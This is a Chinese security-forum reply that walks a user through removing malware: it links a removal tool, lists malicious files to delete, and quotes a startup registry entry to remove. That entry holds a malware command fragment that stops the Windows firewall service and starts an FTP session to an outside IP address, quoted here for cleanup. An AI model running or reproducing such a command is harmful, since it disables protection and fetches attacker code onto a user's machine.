回复 9F 吴文和 的帖子
此样本已收集反馈。另12楼的日志分析如下:下载此工具:
http://bbs.ikaka.com/attachment.aspx?attachmentid=653828删除以下文件
c:\documents and settings\all users\application data\storm\update\%sessionname%\yetgd.cc3
c:\documents and settings\all users\drm\%sessionname%\dlvvm.cc3
c:\documents and settings\all users\application data\storm\update\%youshizhuay%\fbguc.cc3
启动项目 -- 注册表之如下项删除:
[shell] <c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 14.210.97.246 >
shell如果无法删除可以添加everyone并设置完全控制权限之后再删除此项。
另如方便请将c:\program files\benchi.exe压缩发来。